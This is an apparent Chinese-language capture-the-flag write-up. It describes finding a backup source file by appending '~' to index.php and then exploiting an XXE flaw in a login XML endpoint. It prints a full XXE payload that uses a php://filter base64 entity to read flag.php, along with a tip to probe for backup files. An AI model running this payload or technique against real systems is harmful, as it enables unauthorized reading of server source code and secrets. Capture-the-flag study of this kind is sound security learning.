题目:XX?
Flag:flag{IUyasd8213123123890}
打开题目
打开是个假的搜索引擎
在这个页面折腾没有发现任何问题
尝试访问index.php,有新发现
再尝试访问index.php~
发现了源码(一般后面加个~或者.bak的都是备份文件,没有头绪的时候可以试试)
是一道xxe漏洞,user、pass参数我们可以控制
php://input,该协议可以获取post提交的数据
用post的方式发送
Payload:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
php://filter/read=convert.base64-encode/resource该协议可以以base64的方式读取文件,因为转成了base64编码,因此代码不会被执行
拿到了一串base64,解码一下看到flag
网友评论